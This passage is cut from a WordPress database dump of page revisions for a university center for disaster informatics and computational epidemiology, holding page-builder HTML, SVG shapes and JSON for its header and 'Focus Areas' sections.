d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-677 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-677-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-678-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/about/our-mission/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-678 style-local-22-h30 position-relative\"><!----><!----> <span>our mission</span></a>\n                    </span>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h31\" class=\"h-x-container style-217 style-local-22-h31 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h31-group style-217-spacing style-local-22-h31-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h32-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h32\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h32 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h33-outer\">\n            <div data-colibri-id=\"22-h33\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h33 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h34\" class=\"d-block style-221 style-local-22-h34 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h34-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h34-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-04-29 09:59:22','2022-04-29 13:59:22','',22,'https://gsudice.dataconn.net/?p=1304',0,'revision','',0),(1310,1,'2022-05-03 13:24:56','2022-05-03 17:24:56','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-05-03 13:24:56','2022-05-03 17:24:56','',168,'https://gsudice.dataconn.net/?p=1310',0,'revision','',0),(1311,1,'2022-05-03 13:24:56','2022-05-03 17:24:56','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n            <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n            <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-334 style-local-20-c8\">\n                    <!---->\n                    <!---->\n                    <h1 class=\"\">Focus Areas</h1>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n            <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c13\" class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n          <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c16\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 style-local-20-c17 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column 